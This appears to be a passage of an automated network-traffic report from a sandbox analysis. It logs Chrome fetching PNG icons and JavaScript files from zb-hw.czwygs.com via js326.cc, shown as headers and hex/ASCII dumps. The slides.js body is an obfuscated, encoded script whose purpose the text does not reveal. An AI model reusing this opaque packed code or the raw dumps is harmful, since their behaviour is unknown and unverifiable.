                                                                                                                                                          2024-06-09 22:41:21 UTC16384INData Raw: d3 c3 32 9f f9 c0 87 1e 78 ba 0a 60 17 02 45 9a a1 22 85 a4 49 c8 0b 08 33 ea 96 4e 6f b3 16 c4 86 2f 34 b3 ec f3 c7 d2 63 a7 27 85 bd 42 91 e1 f1 60 f4 53 06 fa 7f 6c 64 d9 f7 bf f5 e6 5b cf 2d ac 2c 27 b6 1c 97 21 04 e9 ce ce 5f 4f 34 7b d1 a0 ff e6 6f fc c3 9f ac c8 dc 7d c7 99 bb f1 d2 a3 cf 00 1b 25 e0 15 90 08 a0 6b 50 6c 11 fb 1c f3 69 85 76 47 61 b7 1e c1 d6 2d 50 39 03 0a 84 d9 99 0c ef bf b3 85 7b 32 e0 b9 7a 11 91 09 50 00 1e bc 7d 09 97 2f f5 91 2e cf e3 62 bd 8e 56 14 a1 3b bf 88 bd bc 82 4d 0d 9a 59 8a 7c 38 80 94 25 96 66 67 91 c4 06 71 a8 d1 6a c4 68 a4 31 62 a3 e1 83 47 5d 55 50 60 b8 e0 90 c6 e6 66 3d 88 29 01 39 cd 63 11 7c 40 62 22 cc 74 3a d8 d9 1e 4e e3 a7 f6 3d d3 44 08 55 65 e1 d3 00 ef a7 69 ff a3 44 a1 2c 1c bc 67 a4 3a 81 f5 1e
                                                                                                                                                          Data Ascii: 2x`E"I3No/4c'B`Sld[-,'!_O4{o}%kPlivGa-P9{2zP}/.bV;MY|8%fgqjh1bG]UP`f=)9c|@b"t:N=DUeiD,g:
                                                                                                                                                          2024-06-09 22:41:21 UTC16384INData Raw: 2d c6 5a ac d6 25 97 c1 1a 5c d7 c1 18 f3 27 ba b0 d8 e3 47 dc ed d0 0a 89 e3 96 47 0a 63 0c 5b 5b 9b bc f8 ad 6f a1 27 23 aa 91 c4 13 06 87 1c 29 34 95 6a 84 12 39 c2 53 a4 93 18 37 f0 19 8e 72 66 a2 90 c0 f5 70 d2 98 f7 df 7c 0d bb c7 3f dd ee f7 69 6f 6d 30 1e f4 09 23 9f a9 d6 14 d9 5e fc 6a 18 85 54 5d 17 2b 05 5b e3 3e 42 08 0e 1e 38 40 a7 dd 26 b4 9a 3c 2f 4a 83 6c 25 b1 52 30 1a 0d 49 f2 1c a4 28 69 93 52 e1 b8 2e d6 1a b4 2e f6 a0 b9 8c 4e bb cb a5 8b 57 18 0c 07 54 7c 89 d1 9a 24 49 88 5a d3 34 1a 0d 4e 9d 3a 89 e7 b8 68 e3 62 7d 8b ef fb 38 4e 09 9f ed 0d c6 88 1f 18 35 95 78 39 dc c3 8e a5 14 98 34 a7 48 33 8c 55 65 00 4e 32 c1 73 21 4f 86 54 2b 29 e8 1b ec 5b dc 72 1b 95 f8 48 e8 45 b3 3a ed 4f aa 95 6a 14 85 53 ab be 33 5b f3 32 6f 4b 29 95
                                                                                                                                                          Data Ascii: -Z%\'GGc[[o'#)4j9S7rfp|?iom0#^jT]+[>B8@&</Jl%R0I(iR..NWT|$IZ4N:hb}8N5x94H3UeN2s!OT+)[rHE:OjS3[2oK)
                                                                                                                                                          2024-06-09 22:41:21 UTC16384INData Raw: 90 93 64 ec 78 9e 63 94 f4 ad 23 8d 3d fb de 1b 43 a1 bb ce e2 54 f1 73 81 de 76 ce bd f4 f5 53 6b 17 cf 7f ae 88 cd c9 8a 2d be e0 a5 3b 8f bf f6 8d df 78 6c 4e c5 4c 05 1e 42 39 78 a1 57 52 f2 94 2a ad 90 7c 1f ab 24 52 f9 88 60 0a 69 3d 1c 23 51 f9 9e 35 e1 95 ab 5c f9 e6 d7 b8 fd ca 5b d8 4e ce ce ca 0e 61 a5 c1 91 d3 f7 71 64 df 7e 0e 1e 5c 02 d7 e1 ec d9 0b 5c b8 70 95 24 91 2c ce 36 b0 29 1c 58 5a 60 69 66 8a 99 7d 33 98 61 c6 b7 bf f3 35 0e 1d 39 80 f2 5c a6 a7 3c 9e 7a e2 04 a7 8e 3f 82 32 9a 8d ad 4d 72 a1 48 92 1c 95 a5 9c de 37 cb a7 9f 79 90 c9 c6 2a cf 9e 7c 90 f7 5e 7f 93 7d 51 03 0f c5 d9 77 df e3 e0 c7 5f 20 bf 76 93 d5 95 15 e6 8e 1f a1 db de c5 2b 2c d9 70 8c 4e 26 5c bc 78 91 d5 1b d7 b8 76 e9 32 53 7e 44 35 8c 68 cd cd e0 78 2e a7 0f
                                                                                                                                                          Data Ascii: dxc#=CTsvSk-;xlNLB9xWR*|$R`i=#Q5\[Naqd~\\p$,6)XZ`if}3a59\<z?2MrH7y*|^}Qw_ v+,pN&\xv2S~D5hx.
                                                                                                                                                          2024-06-09 22:41:21 UTC3919INData Raw: 4a 1b 1c 2b 55 3f 3c fa dc 45 91 68 0b 15 2b 3c 27 83 36 11 b9 4c 1a 69 bb 7c 31 0d a5 4d ef 1c 35 47 8f ce 8a c3 77 4f 1a cf 7b 83 46 11 af 81 04 90 92 2d 5b 27 2f 61 b8 ff f2 d9 73 b7 25 19 e7 36 ad e2 83 4e a9 b4 bb e8 64 a7 44 26 53 ac af 2c 0d 04 49 44 ef b6 71 bc de 1c bd e3 fd 74 da 55 ae 2d 5d 64 7a 6f 0f 0f bd 7b 37 c5 3e 81 95 b1 c9 67 3d f2 72 17 56 a2 68 d7 ab 24 b1 02 bb 4e 3e 53 a0 be 32 44 bb 3e ce 4a 7d 11 bf 61 f0 1b 16 cf 7c b9 c5 89 e3 2d f6 dc 59 66 7c d7 18 4e bc 41 d8 7c 9e b0 e5 d0 17 0f 32 3c d1 64 7c 7b 0e a9 7a 39 7b 7a 91 44 39 f4 15 7a c8 58 0e 65 db e0 c8 88 42 49 50 a8 38 0c 8d 0e 32 99 1f 25 8c 6b d4 23 cd 58 56 d9 88 8d 7f f4 93 0f 3f f6 e8 e9 6a f9 a7 3f 7e f4 ca a9 4a 7f ff aa 1f 2e cf b8 93 fd 83 9d f6 06 ba b7 c8 e4 7d
                                                                                                                                                          Data Ascii: J+U?<Eh+<'6Li|1M5GwO{F-['/as%6NdD&S,IDqtU-]dzo{7>g=rVh$N>S2D>J}a|-Yf|NA|2<d|{z9{zD9zXeBIP82%k#XV?j?~J.}


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          611192.168.2.55039590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC378OUTGET /pc/image-pc/index/382/top/icon_psw.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1142
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:17 GMT
                                                                                                                                                          ETag: "64c0a20d-476"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE22[6],EU-FRA-paris-GLOBAL1-CACHE10[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063150
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: bf9582a924feb311034f62f318b7b2d1
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528850
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC1142INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 11 08 06 00 00 00 ed c8 9d 9f 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                                                                                                                                          Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          612192.168.2.55039890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC378OUTGET /pc/image-pc/index/382/top/icon_f_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 475
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:17 GMT
                                                                                                                                                          ETag: "64c0a20d-1db"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE17[4],EU-FRA-paris-GLOBAL1-CACHE23[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063150
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 61ff77896ab533aeb7f15d18aca29f28
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528850
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC475INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 13 00 00 00 12 08 06 00 00 00 b9 0c e5 69 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 01 8d 49 44 41 54 38 8d 8d d4 3d 8c 0e 41 1c c7 f1 cf b3 2e 5e 3b 25 f7 28 50 49 50 20 51 88 48 36 28 84 88 97 84 42 14 2a 92 2b 14 5c fc 5b c9 b8 28 bc 24 ae 51 88 86 c4 29 d0 5b 91 d3 50 a8 b4 c4 c5 25 1e 91 08 c5 25 a2 10 8a 7d 9c f5 64 9e 67 fd aa 9d 99 ef 7c 67 f6 bf b3 d3 91 49 4a 69 17 4e 60 3f d6 a3 c0 37 bc c4 63 dc 8b 88 85 c1 79 9d 01 c9 1a dc c6 81 dc 22 8d 7c c6 44 44 cc 34 3b 97 34 44 9b 30 8b 6d 2d 22 58 85 e3 65 59 76 aa aa 7a fe 8f 2c a5 b4 1a 2f d0 fd 0f 51 33 7b ca b2 ec 55 55 f5 9a ba 16 70 0d eb 32 f0 27 5c c1 79 4c e3 47 86 b9 9e 52 1a 87 22 a5 d4 c5 a9 0c f4 01 9b f1
                                                                                                                                                          Data Ascii: PNGIHDRipHYsIDAT8=A.^;%(PIP QH6(B*+\[($Q)[P%%}dg|gIJiN`?7cy"|DD4;4D0m-"XeYvz,/Q3{UUp2'\yLGR"


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          613192.168.2.55040090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC380OUTGET /pc/image-pc/index/382/news/icon_news.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 426
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:14 GMT
                                                                                                                                                          ETag: "64c0a20a-1aa"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[4],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE29[13],EU-FRA-paris-GLOBAL1-CACHE9[0,TCP_HIT,13],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063149
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a9f2135a2086566c3fbc0a0b9a865a03
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528851
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC426INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 15 00 00 00 13 08 06 00 00 00 7f 4e 46 8b 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 01 5c 49 44 41 54 38 8d a5 d4 3b 4b 9c 41 14 c6 f1 df 6e 96 45 21 28 1a 6c 44 8c 60 f0 52 24 a9 0c 28 8a 82 b1 b2 8e 90 46 10 09 a2 46 62 97 3a 1f 22 82 58 a4 48 2a 6f 85 85 17 b4 14 bf 80 8d 82 24 45 40 42 e2 16 41 51 88 2b 58 bc 63 58 12 76 df 91 7d 60 e0 cc e1 cc 7f ce 9c 39 33 99 e2 41 9b 08 65 f0 01 b3 e8 c1 d7 4a c1 b9 08 e0 03 7c c4 54 98 37 57 0b cd e3 0b 5e 45 6c 1e 05 7d 88 75 8c dc 07 08 d9 32 fe 46 ec 45 02 f3 d8 92 9c 28 4f 92 69 17 a6 51 53 12 38 88 ce c8 c4 6a d1 8b 7a 5c e1 4d a6 78 d0 76 82 f6 48 00 0c 60 1f ad 98 c1 12 ba b1 21 e9 92 be ec 3d 81 a5 9a c0 7b 6c 4b 4a b5 12
                                                                                                                                                          Data Ascii: PNGIHDRNFpHYs\IDAT8;KAnE!(lD`R$(FFb:"XH*o$E@BAQ+XcXv}`93AeJ|T7W^El}u2FE(OiQS8jz\MxvH`!={lKJ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          614192.168.2.55040590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC551OUTGET /pc/240516-03/static/js/components/slides.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC643INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 57212
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:57 GMT
                                                                                                                                                          ETag: "6645cad1-df7c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[2],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE4[632],EU-GER-frankfurt-GLOBAL1-CACHE2[551,TCP_MISS,630],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: fdb1cca0f2144e474ae26747e870ff50
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1630731
                                                                                                                                                          X-CCDN-Expires: 961284
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC15741INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 46 59 42 64 41 47 67 47 38 42 42 41 4d 79 51 45 59 41 75 61 67 56 7a 52 67 42 63 42 4c 64 54 64 30 7a 67 4a 54 6b 41 76 71 51 44 6d 41 52 7a 67 41 76 4a 71 77 37 63 30 76 66 71 53 52 43 41 62 6c 41 42 4f 41 41 68 43 6b 30 70 46 41 47 34 41 68 43 7a 5a 63 65 55 49 51 43 4a 6d 53 45 44 71 54 73 74 6e 44 72 65 4e 6f 41 76 4e 69 53 5a 62 41 41 5a 4f 41 41 55 41 43 31 73 42 4d 6e 55 55 54 67 41 54 48 55 44 76 5a 4d 77 55 62 31 73 4c 42 58 52 62 5a 50 59 41 54 77 67 51 46 47 70 4d 45 47 38 62 41 48 34 51 41 44 6f 6f 43 41 67 41 47 7a 7a 4d 54 67 4d 42 42 68 41 42 41 42 38 75 33 6d 71 51 41 41 38 49 46 43 31 32 4a 47 38 55 41 57 46 4d 54
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgFYBdAGgG8BBAMyQEYAuagVzRgBcBLdTd0zgJTkAvqQDmARzgAvJqw7c0vfqSRCAblABOAAhCk0pFAG4AhCzZceUIQCJmSEDqTstnDreNoAvNiSZbAAZOAAUAC1sBMnUUTgATHUDvZMwUb1sLBXRbZPYATwgQFGpMEG8bAH4QADooCAgAGzzMTgMBBhABAB8u3mqQAA8IFC12JG8UAWFMT
                                                                                                                                                          2024-06-09 22:41:21 UTC16384INData Raw: 76 75 4f 78 62 39 4e 2f 71 6f 62 48 4e 54 6d 51 7a 4d 53 69 49 4e 4d 62 65 72 63 4c 4d 57 6b 7a 6d 4d 79 46 6d 50 43 64 6c 6a 6b 4e 71 72 6d 5a 44 48 70 4a 7a 64 55 36 63 38 30 4c 6e 4e 74 43 37 64 72 73 34 32 53 43 31 58 4d 31 48 72 6a 47 35 75 63 79 36 64 34 61 5a 78 61 49 41 6a 5a 7a 4e 38 6d 45 5a 33 46 43 67 69 6d 53 72 78 49 33 63 68 65 58 63 76 6f 63 48 68 6e 61 37 49 64 50 30 79 64 52 61 4a 2b 6e 34 36 4b 46 6a 4f 70 77 56 75 53 5a 34 48 4e 72 66 71 38 33 67 4e 4d 4f 79 4c 46 30 34 41 7a 75 67 58 4c 35 6d 4c 38 4b 4f 47 45 49 58 47 31 2b 6b 6d 71 6f 71 78 39 56 67 6f 38 2b 57 67 66 36 52 6b 58 6f 79 4b 74 36 75 59 73 5a 69 6f 7a 35 44 41 45 70 46 57 4a 44 75 6e 31 35 34 6a 63 4d 2f 48 7a 30 53 4d 69 72 73 4f 66 57 45 44 6a 76 46 6a 39 6c 70 53 48
                                                                                                                                                          Data Ascii: vuOxb9N/qobHNTmQzMSiINMbercLMWkzmMyFmPCdljkNqrmZDHpJzdU6c80LnNtC7drs42SC1XM1HrjG5ucy6d4aZxaIAjZzN8mEZ3FCgimSrxI3cheXcvocHhna7IdP0ydRaJ+n46KFjOpwVuSZ4HNrfq83gNMOyLF04AzugXL5mL8KOGEIXG1+kmqoqx9Vgo8+Wgf6RkXoyKt6uYsZioz5DAEpFWJDun154jcM/Hz0SMirsOfWEDjvFj9lpSH
                                                                                                                                                          2024-06-09 22:41:21 UTC16384INData Raw: 64 44 51 39 46 38 67 77 71 58 63 48 5a 75 32 79 59 54 4e 44 78 64 4b 58 76 64 4b 78 64 43 51 6a 42 67 30 44 79 58 76 6b 57 4a 63 39 30 31 6c 36 42 69 32 58 36 67 48 6d 42 75 31 30 34 56 2b 44 45 6a 49 55 41 39 77 50 34 35 4d 46 2f 6a 7a 78 38 30 32 32 66 68 31 65 7a 57 51 73 54 5a 6f 67 4a 6e 4c 66 49 71 32 6d 37 5a 2b 58 53 71 6b 39 5a 4a 72 46 7a 66 61 52 63 6e 42 78 77 6b 4d 74 32 4b 6a 68 2b 69 78 58 71 41 79 53 67 63 55 4d 46 50 4b 30 6c 79 4b 53 42 31 42 64 45 48 71 4d 68 7a 38 63 38 76 53 66 44 75 34 71 67 41 55 6a 70 58 48 36 41 68 32 78 58 6e 57 44 59 35 4a 58 31 44 4f 6a 68 34 6e 59 49 4e 47 6a 37 48 68 7a 43 7a 56 44 63 2f 63 74 66 34 45 49 69 57 47 2b 37 35 58 78 38 47 66 41 73 31 63 76 52 55 67 65 58 47 77 73 41 33 44 74 77 59 4e 75 4b 74 4e
                                                                                                                                                          Data Ascii: dDQ9F8gwqXcHZu2yYTNDxdKXvdKxdCQjBg0DyXvkWJc901l6Bi2X6gHmBu104V+DEjIUA9wP45MF/jzx8022fh1ezWQsTZogJnLfIq2m7Z+XSqk9ZJrFzfaRcnBxwkMt2Kjh+ixXqAySgcUMFPK0lyKSB1BdEHqMhz8c8vSfDu4qgAUjpXH6Ah2xXnWDY5JX1DOjh4nYINGj7HhzCzVDc/ctf4EIiWG+75Xx8GfAs1cvRUgeXGwsA3DtwYNuKtN
                                                                                                                                                          2024-06-09 22:41:22 UTC8703INData Raw: 4e 4b 5a 4d 47 6e 38 70 63 73 76 61 6c 5a 45 75 4f 4a 39 64 31 43 70 2f 6b 4e 5a 35 34 6b 4c 4f 4a 52 48 51 47 6c 34 55 4b 47 6c 4e 6d 6d 31 6c 75 73 74 58 78 4e 36 4b 30 46 62 5a 4f 44 32 66 64 4e 76 6c 56 56 4a 30 2b 4e 73 6f 68 4a 51 6b 53 58 36 34 46 48 64 52 37 36 6c 58 41 4e 47 4c 71 35 6b 39 4d 55 5a 6a 74 4d 74 59 4c 74 4f 33 77 77 33 49 33 46 4c 30 75 35 4a 53 31 4d 6b 4a 32 34 6f 46 4a 70 34 76 31 70 69 44 4a 67 38 2f 30 76 6d 61 66 58 4b 6b 2b 61 75 4f 49 70 4b 43 6f 59 41 61 43 72 2f 5a 54 44 79 56 4a 33 34 6f 41 4a 4f 4d 6f 59 70 2b 4d 70 67 35 68 4d 71 41 5a 2b 43 75 74 49 31 41 72 69 6c 50 74 49 70 6c 73 62 54 62 6c 55 49 4d 2f 35 48 33 4d 55 67 38 45 72 6d 41 6d 31 77 34 56 66 33 4f 37 5a 6f 50 54 42 35 4d 38 41 4d 52 6b 31 32 63 61 67 58
                                                                                                                                                          Data Ascii: NKZMGn8pcsvalZEuOJ9d1Cp/kNZ54kLOJRHQGl4UKGlNmm1lustXxN6K0FbZOD2fdNvlVVJ0+NsohJQkSX64FHdR76lXANGLq5k9MUZjtMtYLtO3ww3I3FL0u5JS1MkJ24oFJp4v1piDJg8/0vmafXKk+auOIpKCoYAaCr/ZTDyVJ34oAJOMoYp+Mpg5hMqAZ+CutI1ArilPtIplsbTblUIM/5H3MUg8ErmAm1w4Vf3O7ZoPTB5M8AMRk12cagX


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          615192.168.2.55040290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC549OUTGET /pc/240516-03/static/js/components/news.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC643INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 8744
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:54 GMT
                                                                                                                                                          ETag: "6645cace-2228"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[4],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE14[356],EU-GER-frankfurt-GLOBAL1-CACHE2[351,TCP_MISS,355],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 22d9ffebba30093565c279688fe9d4f3
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823399
                                                                                                                                                          X-CCDN-Expires: 768601
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
